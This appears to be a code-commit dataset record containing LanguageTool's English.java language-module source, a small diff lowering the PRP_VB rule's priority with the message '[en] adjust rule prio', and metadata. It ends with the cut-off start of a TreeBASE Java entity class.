"MORFOLOGIK_RULE_EN_GB": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_CA": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_ZA": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_NZ": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_AU": return -10; // more specific rules (e.g. L2 rules) have priority case "TWO_CONNECTED_MODAL_VERBS": return -15; case "PRP_VB": return -25; // prefer other rules (with suggestions, e.g. confusion rules) case "WANT_TO_NN": return -25; // prefer more specific rules that give a suggestion case "QUESTION_WITHOUT_VERB": return -25; // prefer more specific rules that give a suggestion case "SENTENCE_FRAGMENT": return -50; // prefer other more important sentence start corrections. case "AI_HYDRA_LEO_MISSING_COMMA": return -51; // prefer comma style rules. case "SENTENCE_FRAGMENT_SINGLE_WORDS": return -51; // prefer other more important sentence start corrections. case "EN_REDUNDANCY_REPLACE": return -510; // style rules should always have the lowest priority. case "EN_PLAIN_ENGLISH_REPLACE": return -511; // style rules should always have the lowest priority. case "THREE_NN": return -600; // style rules should always have the lowest priority. case "SENT_START_NUM": return -600; // style rules should always have the lowest priority. 
case "PASSIVE_VOICE": return -600; // style rules should always have the lowest priority. case "EG_NO_COMMA": return -600; // style rules should always have the lowest priority. case "IE_NO_COMMA": return -600; // style rules should always have the lowest priority. case "REASON_WHY": return -600; // style rules should always have the lowest priority. case LongSentenceRule.RULE_ID: return -997; case LongParagraphRule.RULE_ID: return -998; } if (id.startsWith("CONFUSION_RULE_")) { return -20; } if (id.startsWith("AI_HYDRA_LEO")) { // prefer more specific rules (also speller) return -11; } if (id.startsWith("AI_EN_G_")) { // prefer more specific rules (also speller) return -21; } if (id.matches("EN_FOR_[A-Z]+_SPEAKERS_FALSE_FRIENDS.*")) { return -21; } return super.getPriorityForId(id); } @Override public Function<Rule, Rule> getRemoteEnhancedRules(ResourceBundle messageBundle, List<RemoteRuleConfig> configs, UserConfig userConfig, Language motherTongue, List<Language> altLanguages, boolean inputLogging) throws IOException { Function<Rule, Rule> fallback = super.getRemoteEnhancedRules(messageBundle, configs, userConfig, motherTongue, altLanguages, inputLogging); RemoteRuleConfig bert = RemoteRuleConfig.getRelevantConfig(BERTSuggestionRanking.RULE_ID, configs); return original -> { if (original.isDictionaryBasedSpellingRule() && original.getId().startsWith("MORFOLOGIK_RULE_EN")) { if (bert != null) { return new BERTSuggestionRanking(this, original, bert, inputLogging); } } return fallback.apply(original); }; } @Override public List<Rule> getRelevantRemoteRules(ResourceBundle messageBundle, List<RemoteRuleConfig> configs, GlobalConfig globalConfig, UserConfig userConfig, Language motherTongue, List<Language> altLanguages, boolean inputLogging) throws IOException { List<Rule> rules = new ArrayList<>(super.getRelevantRemoteRules( messageBundle, configs, globalConfig, userConfig, motherTongue, altLanguages, inputLogging)); // no description needed - matches based on automatically created rules with descriptions provided by remote server rules.addAll(GRPCRule.createAll(this, configs, inputLogging, "AI_EN_", "INTERNAL - dynamically loaded rule supported by remote server")); rules.addAll(GRPCRule.createAll(this, configs, inputLogging, "AI_HYDRA_LEO", "INTERNAL - dynamically loaded rule supported by remote server")); return rules; } }
languagetool-language-modules/en/src/main/java/org/languagetool/language/English.java
/* LanguageTool, a natural language style checker * Copyright (C) 2007 Daniel Naber (http://www.danielnaber.de) * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 * USA */ package org.languagetool.language; import com.google.common.cache.CacheBuilder; import com.google.common.cache.CacheLoader; import com.google.common.cache.LoadingCache; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import org.languagetool.*; import org.languagetool.chunking.Chunker; import org.languagetool.chunking.EnglishChunker; import org.languagetool.languagemodel.LanguageModel; import org.languagetool.rules.*; import org.languagetool.rules.en.*; import org.languagetool.rules.neuralnetwork.NeuralNetworkRuleCreator; import org.languagetool.rules.neuralnetwork.Word2VecModel; import org.languagetool.rules.patterns.PatternRuleLoader; import org.languagetool.synthesis.Synthesizer; import org.languagetool.synthesis.en.EnglishSynthesizer; import org.languagetool.tagging.Tagger; import org.languagetool.tagging.disambiguation.Disambiguator; import org.languagetool.tagging.en.EnglishHybridDisambiguator; import org.languagetool.tagging.en.EnglishTagger; import org.languagetool.tokenizers.SRXSentenceTokenizer; import org.languagetool.tokenizers.SentenceTokenizer; import org.languagetool.tokenizers.Tokenizer; import org.languagetool.tokenizers.en.EnglishWordTokenizer; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import java.util.ResourceBundle; import java.util.concurrent.TimeUnit; import java.util.function.Function; /** * Support for English - use the sub classes {@link BritishEnglish}, {@link AmericanEnglish}, * etc. if you need spell checking. * Make sure to call {@link #close()} after using this (currently only relevant if you make * use of {@link EnglishConfusionProbabilityRule}). */ public class English extends Language implements AutoCloseable { private static final LoadingCache<String, List<Rule>> cache = CacheBuilder.newBuilder() .expireAfterWrite(30, TimeUnit.MINUTES) .build(new CacheLoader<String, List<Rule>>() { @Override public List<Rule> load(@NotNull String path) throws IOException { List<Rule> rules = new ArrayList<>(); PatternRuleLoader loader = new PatternRuleLoader(); try (InputStream is = JLanguageTool.getDataBroker().getAsStream(path)) { rules.addAll(loader.getRules(is, path)); } return rules; } }); private static final Language AMERICAN_ENGLISH = new AmericanEnglish(); private LanguageModel languageModel; /** * @deprecated use {@link AmericanEnglish} or {@link BritishEnglish} etc. 
instead - * they have rules for spell checking, this class doesn't (deprecated since 3.2) */ @Deprecated public English() { } @Override public Language getDefaultLanguageVariant() { return AMERICAN_ENGLISH; } @Override public SentenceTokenizer createDefaultSentenceTokenizer() { return new SRXSentenceTokenizer(this); } @Override public String getName() { return "English"; } @Override public String getShortCode() { return "en"; } @Override public String[] getCountries() { return new String[]{}; } @NotNull @Override public Tagger createDefaultTagger() { return EnglishTagger.INSTANCE; } @Nullable @Override public Chunker createDefaultChunker() { return new EnglishChunker(); } @Nullable @Override public Synthesizer createDefaultSynthesizer() { return new EnglishSynthesizer(this); } @Override public Disambiguator createDefaultDisambiguator() { return new EnglishHybridDisambiguator(); } @Override public Tokenizer createDefaultWordTokenizer() { return new EnglishWordTokenizer(); } @Override public synchronized LanguageModel getLanguageModel(File indexDir) throws IOException { languageModel = initLanguageModel(indexDir, languageModel); return languageModel; } @Override public synchronized Word2VecModel getWord2VecModel(File indexDir) throws IOException { return new Word2VecModel(indexDir + File.separator + getShortCode()); } @Override public Contributor[] getMaintainers() { return new Contributor[] { new Contributor("Mike Unwalla"), Contributors.MARCIN_MILKOWSKI, Contributors.DANIEL_NABER }; } @Override public LanguageMaintainedState getMaintainedState() { return LanguageMaintainedState.ActivelyMaintained; } @Override public List<Rule> getRelevantRules(ResourceBundle messages, UserConfig userConfig, Language motherTongue, List<Language> altLanguages) throws IOException { List<Rule> allRules = new ArrayList<>(); if (motherTongue != null) { if ("de".equals(motherTongue.getShortCode())) { allRules.addAll(cache.getUnchecked("/org/languagetool/rules/en/grammar-l2-de.xml")); } else if ("fr".equals(motherTongue.getShortCode())) { allRules.addAll(cache.getUnchecked("/org/languagetool/rules/en/grammar-l2-fr.xml")); } } allRules.addAll(Arrays.asList( new CommaWhitespaceRule(messages, Example.wrong("We had coffee<marker> ,</marker> cheese and crackers and grapes."), Example.fixed("We had coffee<marker>,</marker> cheese and crackers and grapes.")), new DoublePunctuationRule(messages), new UppercaseSentenceStartRule(messages, this, Example.wrong("This house is old. <marker>it</marker> was built in 1950."), Example.fixed("This house is old. 
<marker>It</marker> was built in 1950.")), new MultipleWhitespaceRule(messages, this), new SentenceWhitespaceRule(messages), new WhiteSpaceBeforeParagraphEnd(messages, this), new WhiteSpaceAtBeginOfParagraph(messages), new EmptyLineRule(messages, this), new LongSentenceRule(messages, userConfig, 40), new LongParagraphRule(messages, this, userConfig), new ParagraphRepeatBeginningRule(messages, this), new PunctuationMarkAtParagraphEnd(messages, this), new PunctuationMarkAtParagraphEnd2(messages, this), // specific to English: new ConsistentApostrophesRule(messages), new EnglishSpecificCaseRule(messages), new EnglishUnpairedBracketsRule(messages, this), new EnglishWordRepeatRule(messages, this), new AvsAnRule(messages), new EnglishWordRepeatBeginningRule(messages, this), new CompoundRule(messages), new ContractionSpellingRule(messages), new EnglishWrongWordInContextRule(messages), new EnglishDashRule(messages), new WordCoherencyRule(messages), new EnglishDiacriticsRule(messages), new EnglishPlainEnglishRule(messages), new EnglishRedundancyRule(messages), new SimpleReplaceRule(messages, this), new ReadabilityRule(messages, this, userConfig, false), new ReadabilityRule(messages, this, userConfig, true) )); return allRules; } @Override public List<Rule> getRelevantLanguageModelRules(ResourceBundle messages, LanguageModel languageModel, UserConfig userConfig) throws IOException { return Arrays.asList( new UpperCaseNgramRule(messages, languageModel, this, userConfig), new EnglishConfusionProbabilityRule(messages, languageModel, this), new EnglishNgramProbabilityRule(messages, languageModel, this) ); } @Override public List<Rule> getRelevantLanguageModelCapableRules(ResourceBundle messages, @Nullable LanguageModel lm, GlobalConfig globalConfig, UserConfig userConfig, Language motherTongue, List<Language> altLanguages) throws IOException { if (lm != null && motherTongue != null && "fr".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForFrenchFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "de".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForGermansFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "es".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForSpaniardsFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "nl".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForDutchmenFalseFriendRule(messages, lm, motherTongue, this) ); } return Arrays.asList(); } @Override public boolean hasNGramFalseFriendRule(Language motherTongue) { return motherTongue != null && ( // Note: extend EnglishForL2SpeakersFalseFriendRuleTest.testMessageDetailData() // if you add a language here "de".equals(motherTongue.getShortCode()) || "fr".equals(motherTongue.getShortCode()) || "es".equals(motherTongue.getShortCode()) || "nl".equals(motherTongue.getShortCode())); } @Override public List<Rule> getRelevantWord2VecModelRules(ResourceBundle messages, Word2VecModel word2vecModel) throws IOException { return NeuralNetworkRuleCreator.createRules(messages, this, word2vecModel); } /** @since 5.1 */ @Override public String getOpeningDoubleQuote() { return "“"; } /** @since 5.1 */ @Override public String getClosingDoubleQuote() { return "”"; } /** @since 5.1 */ @Override public String getOpeningSingleQuote() { return "‘"; } /** @since 5.1 */ @Override public String getClosingSingleQuote() { return 
"’"; } /** @since 5.1 */ @Override public boolean isAdvancedTypographyEnabled() { return true; } /** * Closes the language model, if any. * @since 2.7 */ @Override public void close() throws Exception { if (languageModel != null) { languageModel.close(); } } @Override protected int getPriorityForId(String id) { switch (id) { case "I_E": return 10; // needs higher prio than EN_COMPOUNDS ("i.e learning") case "EN_DIACRITICS_REPLACE": return 9; // prefer over spell checker (like PHRASE_REPETITION) case "CHILDISH_LANGUAGE": return 8; // prefer over spell checker case "RUDE_SARCASTIC": return 6; // prefer over spell checker case "FOR_NOUN_SAKE": return 6; // prefer over PROFANITY (e.g. "for fuck sake") case "YEAR_OLD_HYPHEN": return 6; // higher prio than MISSING_HYPHEN case "MISSING_HYPHEN": return 5; case "TRANSLATION_RULE": return 5; // Premium case "WRONG_APOSTROPHE": return 5; case "DOS_AND_DONTS": return 3; case "EN_COMPOUNDS": return 2; case "ABBREVIATION_PUNCTUATION": return 2; case "FEDEX": return 2; // higher prio than many verb rules (e.g. MD_BASEFORM) case "LIFE_COMPOUNDS": return 1; case "DRIVE_THROUGH_HYPHEN": return 1; // higher prio than agreement rules case "CAUSE_COURSE": return 1; // higher prio than CAUSE_BECAUSE case "AN_AND": return 1; // higher prio than A_MY and DT_PRP case "HER_S": return 1; // higher prio than THEIR_S case "COVID_19": return 1; case "OTHER_WISE_COMPOUND": return 1; case "ON_EXCEL": return 1; case "IF_VB_PCT": return 1; // higher prio than IF_VB case "CAUSE_BECAUSE": return 1; // higher prio than MISSING_TO_BETWEEN_BE_AND_VB case "MAY_MANY": return 1; // higher prio than MAY_MANY_MY case "BOUT_TO": return 1; // higher prio than PRP_VB case "HAVE_HAVE": return 1; // higher prio than HE_D_VBD case "LUV": return 1; // higher prio than spell checker case "DAT": return 1; // higher prio than spell checker case "MAC_OS": return 1; // higher prio than spell checker case "BESTEST": return 1; // higher prio than spell checker case "OFF_OF": return 1; // higher prio than ADJECTIVE_ADVERB case "SHELL_COMPOUNDS": return 1; // higher prio than HELL case "HANDS_ON_HYPHEN": return 1; // higher prio than A_NNS case "QUIET_QUITE": return 1; // higher prio than A_QUITE_WHILE case "A_OK": return 1; // prefer over A_AN case "I_A": return 1; // higher prio than I_IF case "GOT_GO": return 1; // higher prio than MD_BASEFORM case "THERE_FORE": return 1; // higher prio than FORE_FOR case "PRP_NO_VB": return 1; // higher prio than I_IF case "FOLLOW_UP": return 1; // higher prio than MANY_NN case "IT_SOMETHING": return 1; // higher prio than IF_YOU_ANY and IT_THE_PRP case "NO_KNOW": return 1; // higher prio than DOUBLE_NEGATIVE case "WILL_BASED_ON": return 1; // higher prio than MD_BASEFORM / PRP_PAST_PART case "DON_T_AREN_T": return 1; // higher prio than DID_BASEFORM case "WILL_BECOMING": return 1; // higher prio than MD_BASEFORM case "WOULD_NEVER_VBN": return 1; // higher prio than MD_BASEFORM case "MD_APPRECIATED": return 1; // higher prio than MD_BASEFORM case "MONEY_BACK_HYPHEN": return 1; // higher prio than A_UNCOUNTABLE case "WORLDS_BEST": return 1; // higher prio than THE_SUPERLATIVE case "STEP_COMPOUNDS": return 1; // higher prio than STARS_AND_STEPS case "WON_T_TO": return 1; // higher prio than DON_T_AREN_T case "WAN_T": return 1; // higher prio than DON_T_AREN_T case "THE_US": return 1; // higher prio than DT_PRP case "THE_IT": return 1; // higher prio than DT_PRP case "THANK_YOU_MUCH": return 1; // higher prio than other rules case "TO_DO_HYPHEN": return 1; // 
higher prio than other rules case "A_NUMBER_NNS": return 1; // higher prio than A_NNS case "A_HUNDREDS": return 1; // higher prio than A_NNS case "NOW_A_DAYS": return 1; // higher prio than A_NNS case "COUPLE_OF_TIMES": return 1; // higher prio than A_NNS case "A_WINDOWS": return 1; // higher prio than A_NNS case "A_SCISSOR": return 1; // higher prio than A_NNS case "A_SNICKERS": return 1; // higher prio than A_NNS case "ROUND_A_BOUT": return 1; // higher prio than A_NNS case "A_NNS_BEST_NN": return 1; // higher prio than A_NNS case "A_BACHELORS_IN": return 1; // higher prio than A_NNS case "NEITHER_NOR": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "FOR_AWHILE": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "A_BUT": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "MAY_BE": return 1; // higher prio than IS_IT_MAY (premium rule) case "BORN_IN": return 1; // higher prio than PRP_PAST_PART case "DO_TO": return 1; // higher prio than HAVE_PART_AGREEMENT case "CURIOS_CURIOUS": return 1; // higher prio than A_NNS and POSSESSIVE_APOSTROPHE case "INCORRECT_POSSESSIVE_APOSTROPHE": return 1; // higher prio than THIS_NNS case "THIS_YEARS_POSSESSIVE_APOSTROPHE": return 1; // higher prio than THIS_NNS case "SPURIOUS_APOSTROPHE": return 1; // higher prio than THIS_NNS case "IN_THIS_REGARDS": return 1; // higher prio than THIS_NNS case "NO_WHERE": return 1; // higher prio than NOW case "APOSTROPHE_VS_QUOTE": return 1; // higher prio than EN_QUOTES case "COMMA_PERIOD": return 1; // higher prio than COMMA_PARENTHESIS_WHITESPACE case "HERE_HEAR": return 1; // higher prio than ENGLISH_WORD_REPEAT_RULE case "LIGATURES": return 1; // prefer over spell checker case "APPSTORE": return 1; // prefer over spell checker case "INCORRECT_CONTRACTIONS": return 1; // prefer over EN_CONTRACTION_SPELLING case "DONT_T": return 1; // prefer over EN_CONTRACTION_SPELLING case "WHATS_APP": return 1; // prefer over EN_CONTRACTION_SPELLING case "NON_STANDARD_COMMA": return 1; // prefer over spell checker case "NON_STANDARD_ALPHABETIC_CHARACTERS": return 1; // prefer over spell checker case "WONT_CONTRACTION": return 1; // prefer over WONT_WANT case "YOU_GOOD": return 1; // prefer over PRP_PAST_PART case "THAN_THANK": return 1; // prefer over THAN_THEN case "CD_NN_APOSTROPHE_S": return 1; // prefer over CD_NN and LOWERCASE_NAME_APOSTROPHE_S case "IT_IF": return 1; // needs higher prio than PRP_COMMA and IF_YOU_ANY case "FINE_TUNE_COMPOUNDS": return 1; // prefer over less specific rules case "WHAT_IS_YOU": return 1; // prefer over HOW_DO_I_VB, NON3PRS_VERB case "SUPPOSE_TO": return 1; // prefer over HOW_DO_I_VB case "SEEN_SEEM": return 1; // prefer over PRP_PAST_PART case "PROFANITY": return 1; // prefer over spell checker (less prio than EN_COMPOUNDS) case "THE_THEM": return 1; // prefer over TO_TWO case "THERE_THEIR": return 1; // prefer over GO_TO_HOME case "IT_IS_DEPENDING_ON": return 1; // prefer over PROGRESSIVE_VERBS case "IRREGARDLESS": return 1; // prefer over spell checker case "WANNA": return 1; // prefer over spell checker case "LOOK_FORWARD_TO": return 1; // prefer over LOOK_FORWARD_NOT_FOLLOWED_BY_TO case "LOOK_SLIKE": return 1; // higher prio than prem:SINGULAR_NOUN_VERB_AGREEMENT case "ANYWAYS": return -1; // higher prio than spell checker case "MISSING_GENITIVE": return -1; // prefer over spell checker (like EN_SPECIFIC_CASE) case "EN_UNPAIRED_BRACKETS": return -1; // less priority than rules that suggest the correct brackets case "NEEDS_FIXED": return -1; // less priority 
than MISSING_TO_BEFORE_A_VERB case "BLACK_SEA": return -1; // less priority than SEA_COMPOUNDS case "A_TO": return -1; // less priority than other rules that offer suggestions case "MANY_NN": return -1; // less priority than PUSH_UP_HYPHEN, SOME_FACULTY case "WE_BE": return -1; case "A_LOT_OF_NN": return -1; case "IT_VBZ": return -1; case "ORDER_OF_WORDS_WITH_NOT": return -1; // less prio than punctuation rules case "ADVERB_WORD_ORDER_10_TEMP": return 1; case "ADVERB_WORD_ORDER": return -1; // less prio than PRP_PAST_PART // case "IT_IS_2": return -1; // needs higher prio than BEEN_PART_AGREEMENT case "A_RB_NN": return -1; // prefer other more specific rules (e.g. QUIET_QUITE, A_QUITE_WHILE) case "DT_RB_IN": return -1; // prefer other more specific rules case "VERB_NOUN_CONFUSION": return -1; // prefer other more specific rules case "NOUN_VERB_CONFUSION": return -1; // prefer other more specific rules case "PLURAL_VERB_AFTER_THIS": return -1; // prefer other more specific rules (e.g. COMMA_TAG_QUESTION) case "BE_RB_BE": return -1; // prefer other more specific rules case "IT_ITS": return -1; // prefer other more specific rules case "ENGLISH_WORD_REPEAT_RULE": return -1; // prefer other more specific rules (e.g. IT_IT) case "PRP_MD_NN": return -1; // prefer other more specific rules (e.g. MD_ABLE, WONT_WANT) case "NON_ANTI_PRE_JJ": return -1; // prefer other more specific rules case "DT_JJ_NO_NOUN": return -1; // prefer other more specific rules (e.g. THIRD_PARTY) case "AGREEMENT_SENT_START": return -1; // prefer other more specific rules case "HAVE_PART_AGREEMENT": return -1; // prefer other more specific rules case "PREPOSITION_VERB": return -1; // prefer other more specific rules case "EN_A_VS_AN": return -1; // prefer other more specific rules (with suggestions, e.g. AN_ALSO) case "CD_NN": return -1; // prefer other more specific rules (with suggestions) case "ATD_VERBS_TO_COLLOCATION": return -1; // prefer other more specific rules (with suggestions) case "ADVERB_OR_HYPHENATED_ADJECTIVE": return -1; // prefer other more specific rules (with suggestions) case "GOING_TO_VBD": return -1; // prefer other more specific rules (with suggestions, e.g. GOING_TO_JJ) case "MISSING_PREPOSITION": return -1; // prefer other more specific rules (with suggestions) case "BE_TO_VBG": return -1; // prefer other more specific rules (with suggestions) case "NON3PRS_VERB": return -1; // prefer other more specific rules (with suggestions, e.g. DONS_T) case "DID_FOUND_AMBIGUOUS": return -1; // prefer other more specific rules (e.g. TWO_CONNECTED_MODAL_VERBS) case "BE_I_BE_GERUND": return -1; // prefer other more specific rules (with suggestions) case "VBZ_VBD": return -1; // prefer other more specific rules (e.g. 
IS_WAS) case "SUPERLATIVE_THAN": return -1; // prefer other more specific rules case "UNLIKELY_OPENING_PUNCTUATION": return -1; // prefer other more specific rules case "METRIC_UNITS_EN_IMPERIAL": return -1; // prefer MILE_HYPHEN case "METRIC_UNITS_EN_GB": return -1; // prefer MILE_HYPHEN case "COMMA_COMPOUND_SENTENCE": return -1; // prefer other rules case "COMMA_COMPOUND_SENTENCE_2": return -1; // prefer other rules case "REPEATED_VERBS": return -1; // prefer other rules case "PRP_RB_NO_VB": return -2; // prefer other more specific rules (with suggestions) case "PRP_VBG": return -2; // prefer other more specific rules (with suggestions, prefer over HE_VERB_AGR) case "PRP_VBZ": return -2; // prefer other more specific rules (with suggestions) case "PRP_VB": return -2; // prefer other more specific rules (with suggestions) case "BE_VBP_IN": return -2; // prefer over BEEN_PART_AGREEMENT case "BEEN_PART_AGREEMENT": return -3; // prefer other more specific rules (e.g. VARY_VERY, VB_NN) case "A_INFINITIVE": return -3; // prefer other more specific rules (with suggestions, e.g. PREPOSITION_VERB, THE_TO) case "HE_VERB_AGR": return -3; // prefer other more specific rules (e.g. PRP_VBG) case "PRP_JJ": return -3; // prefer other rules (e.g. PRP_VBG, IT_IT and ADJECTIVE_ADVERB, PRP_ABLE, PRP_NEW, MD_IT_JJ) case "PRONOUN_NOUN": return -3; // prefer other rules (e.g. PRP_VB, PRP_JJ) case "INDIAN_ENGLISH": return -3; // prefer grammar rules, but higher prio than spell checker case "GONNA_TEMP": return -3; case "PRP_THE": return -4; // prefer other rules (e.g. I_A, PRP_JJ, IF_YOU_ANY, I_AN) case "GONNA": return -4; // prefer over spelling rules case "WHATCHA": return -4; // prefer over spelling rules case "DONTCHA": return -4; // prefer over spelling rules case "GOTCHA": return -4; // prefer over spelling rules case "OUTTA": return -4; // prefer over spelling rules case "Y_ALL": return -4; // prefer over spelling rules case "GIMME": return -4; // prefer over spelling rules case "LEMME": return -4; // prefer over spelling rules case "MORFOLOGIK_RULE_EN_US": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_GB": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_CA": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_ZA": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_NZ": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_AU": return -10; // more specific rules (e.g. L2 rules) have priority case "TWO_CONNECTED_MODAL_VERBS": return -15; case "WANT_TO_NN": return -25; // prefer more specific rules that give a suggestion case "QUESTION_WITHOUT_VERB": return -25; // prefer more specific rules that give a suggestion case "SENTENCE_FRAGMENT": return -50; // prefer other more important sentence start corrections. case "AI_HYDRA_LEO_MISSING_COMMA": return -51; // prefer comma style rules. case "SENTENCE_FRAGMENT_SINGLE_WORDS": return -51; // prefer other more important sentence start corrections. case "EN_REDUNDANCY_REPLACE": return -510; // style rules should always have the lowest priority. case "EN_PLAIN_ENGLISH_REPLACE": return -511; // style rules should always have the lowest priority. case "THREE_NN": return -600; // style rules should always have the lowest priority. case "SENT_START_NUM": return -600; // style rules should always have the lowest priority. 
case "PASSIVE_VOICE": return -600; // style rules should always have the lowest priority. case "EG_NO_COMMA": return -600; // style rules should always have the lowest priority. case "IE_NO_COMMA": return -600; // style rules should always have the lowest priority. case "REASON_WHY": return -600; // style rules should always have the lowest priority. case LongSentenceRule.RULE_ID: return -997; case LongParagraphRule.RULE_ID: return -998; } if (id.startsWith("CONFUSION_RULE_")) { return -20; } if (id.startsWith("AI_HYDRA_LEO")) { // prefer more specific rules (also speller) return -11; } if (id.startsWith("AI_EN_G_")) { // prefer more specific rules (also speller) return -21; } if (id.matches("EN_FOR_[A-Z]+_SPEAKERS_FALSE_FRIENDS.*")) { return -21; } return super.getPriorityForId(id); } @Override public Function<Rule, Rule> getRemoteEnhancedRules(ResourceBundle messageBundle, List<RemoteRuleConfig> configs, UserConfig userConfig, Language motherTongue, List<Language> altLanguages, boolean inputLogging) throws IOException { Function<Rule, Rule> fallback = super.getRemoteEnhancedRules(messageBundle, configs, userConfig, motherTongue, altLanguages, inputLogging); RemoteRuleConfig bert = RemoteRuleConfig.getRelevantConfig(BERTSuggestionRanking.RULE_ID, configs); return original -> { if (original.isDictionaryBasedSpellingRule() && original.getId().startsWith("MORFOLOGIK_RULE_EN")) { if (bert != null) { return new BERTSuggestionRanking(this, original, bert, inputLogging); } } return fallback.apply(original); }; } @Override public List<Rule> getRelevantRemoteRules(ResourceBundle messageBundle, List<RemoteRuleConfig> configs, GlobalConfig globalConfig, UserConfig userConfig, Language motherTongue, List<Language> altLanguages, boolean inputLogging) throws IOException { List<Rule> rules = new ArrayList<>(super.getRelevantRemoteRules( messageBundle, configs, globalConfig, userConfig, motherTongue, altLanguages, inputLogging)); // no description needed - matches based on automatically created rules with descriptions provided by remote server rules.addAll(GRPCRule.createAll(this, configs, inputLogging, "AI_EN_", "INTERNAL - dynamically loaded rule supported by remote server")); rules.addAll(GRPCRule.createAll(this, configs, inputLogging, "AI_HYDRA_LEO", "INTERNAL - dynamically loaded rule supported by remote server")); return rules; } }
[en] adjust rule prio
languagetool-language-modules/en/src/main/java/org/languagetool/language/English.java
[en] adjust rule prio
<ide><path>anguagetool-language-modules/en/src/main/java/org/languagetool/language/English.java <ide> case "PRP_RB_NO_VB": return -2; // prefer other more specific rules (with suggestions) <ide> case "PRP_VBG": return -2; // prefer other more specific rules (with suggestions, prefer over HE_VERB_AGR) <ide> case "PRP_VBZ": return -2; // prefer other more specific rules (with suggestions) <del> case "PRP_VB": return -2; // prefer other more specific rules (with suggestions) <ide> case "BE_VBP_IN": return -2; // prefer over BEEN_PART_AGREEMENT <ide> case "BEEN_PART_AGREEMENT": return -3; // prefer other more specific rules (e.g. VARY_VERY, VB_NN) <ide> case "A_INFINITIVE": return -3; // prefer other more specific rules (with suggestions, e.g. PREPOSITION_VERB, THE_TO) <ide> case "MORFOLOGIK_RULE_EN_NZ": return -10; // more specific rules (e.g. L2 rules) have priority <ide> case "MORFOLOGIK_RULE_EN_AU": return -10; // more specific rules (e.g. L2 rules) have priority <ide> case "TWO_CONNECTED_MODAL_VERBS": return -15; <add> case "PRP_VB": return -25; // prefer other rules (with suggestions, e.g. confusion rules) <ide> case "WANT_TO_NN": return -25; // prefer more specific rules that give a suggestion <ide> case "QUESTION_WITHOUT_VERB": return -25; // prefer more specific rules that give a suggestion <ide> case "SENTENCE_FRAGMENT": return -50; // prefer other more important sentence start corrections.
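A note on the priority table in English.java above: as its inline comments indicate, these return values decide which rule's match should win when several rules flag overlapping text, with style rules (around -600 and below) always deferring to grammar and spelling rules. The following is a minimal, self-contained Java sketch of that selection idea only; the Match record, the sample rule ids, and keepHighestPriority() are illustrative stand-ins and are not LanguageTool's actual API.

import java.util.ArrayList;
import java.util.List;

// Illustrative stand-in for a rule match; NOT a LanguageTool class.
record Match(String ruleId, int from, int to, int priority) {}

public class RulePrioritySketch {

    // Keep a match only if no overlapping match has a strictly higher priority.
    static List<Match> keepHighestPriority(List<Match> matches) {
        List<Match> kept = new ArrayList<>();
        for (Match m : matches) {
            boolean dominated = false;
            for (Match other : matches) {
                if (other == m) {
                    continue;
                }
                boolean overlaps = m.from() < other.to() && other.from() < m.to();
                if (overlaps && other.priority() > m.priority()) {
                    dominated = true;
                    break;
                }
            }
            if (!dominated) {
                kept.add(m);
            }
        }
        return kept;
    }

    public static void main(String[] args) {
        // A style rule and a grammar rule flag the same span 10..14;
        // only the higher-priority grammar match survives.
        List<Match> matches = List.of(
                new Match("EG_NO_COMMA", 10, 14, -600),
                new Match("COMMA_COMPOUND_SENTENCE", 10, 14, -1));
        System.out.println(keepHighestPriority(matches));
    }
}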
Java
bsd-3-clause
6801ac17341daa70485e95453d65b23dd9219243
0
TreeBASE/treebase,TreeBASE/treebase,TreeBASE/treebasetest,TreeBASE/treebasetest,TreeBASE/treebase,TreeBASE/treebase,TreeBASE/treebasetest,TreeBASE/treebasetest,TreeBASE/treebase,TreeBASE/treebasetest,TreeBASE/treebasetest,TreeBASE/treebasetest,TreeBASE/treebase
package org.cipres.treebase.domain.tree; import java.util.ArrayList; import java.util.List; import javax.persistence.AttributeOverride; import javax.persistence.CascadeType; import javax.persistence.Column; import javax.persistence.Entity; import javax.persistence.FetchType; import javax.persistence.JoinColumn; import javax.persistence.ManyToOne; import javax.persistence.OneToOne; import javax.persistence.Table; import javax.persistence.Transient; import org.hibernate.annotations.BatchSize; import org.hibernate.annotations.Cache; import org.hibernate.annotations.CacheConcurrencyStrategy; import org.hibernate.annotations.Index; import org.cipres.treebase.TreebaseUtil; import org.cipres.treebase.domain.AbstractPersistedObject; import org.cipres.treebase.domain.TBPersistable; import org.cipres.treebase.domain.taxon.TaxonLabel; /** * PhyloTreeNode.java * * The treebase implementation of a general tree node. * * Created on Mar 13, 2006 * * @author Jin Ruan * */ @Entity @Table(name = "PHYLOTREENODE") @AttributeOverride(name = "id", column = @Column(name = "PHYLOTREENODE_ID")) @Cache(usage = CacheConcurrencyStrategy.NONSTRICT_READ_WRITE, region = 